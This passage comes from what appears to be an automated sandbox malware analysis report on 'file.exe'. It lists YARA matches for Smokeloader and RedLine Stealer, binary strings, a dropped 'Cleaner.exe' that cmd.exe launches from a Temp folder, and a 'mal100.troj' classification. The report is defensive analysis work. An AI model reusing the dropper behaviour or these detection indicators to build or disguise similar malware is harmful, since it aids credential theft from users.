00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 
00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 
00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

### System Summary

 Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author:
unknown Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 
00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 
00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown  Source: file.exe, 00000000.00000003.348925452.0000000003B6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C$ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . 
S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
 Source: soft[1].0.dr String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C$ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
 Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C28C2 33_2_00007FFBB00C28C2 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C2EE5 33_2_00007FFBB00C2EE5 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C1B2E 33_2_00007FFBB00C1B2E Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00CA91D 33_2_00007FFBB00CA91D Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C394F 33_2_00007FFBB00C394F Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C553E 33_2_00007FFBB00C553E Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C3F72 33_2_00007FFBB00C3F72 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C9B6D 33_2_00007FFBB00C9B6D Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C678F 33_2_00007FFBB00C678F Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C57D8 33_2_00007FFBB00C57D8 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C4601 33_2_00007FFBB00C4601 Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Code function: 33_2_00007FFBB00C4EDD 33_2_00007FFBB00C4EDD
 Source: file.exe Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
 Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
 Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
 Source: Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
 Source: file.exe ReversingLabs: Detection: 47%
 Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
 Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 700
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 732
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 744
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 776
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 900
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 964
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1152
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1280
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
 Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
 Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1272
 Source: C:\Users\user\Desktop\file.exe Process created: unknown unknown
 Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
 Source: classification engine Classification label: mal100.troj.winEXE@17/52@1/5
 Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5380 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
 Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
 Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe
 Source: Cleaner.exe.0.dr Static PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]
 Source: initial sample Static PE information: section name: .text entropy: 7.920922021912582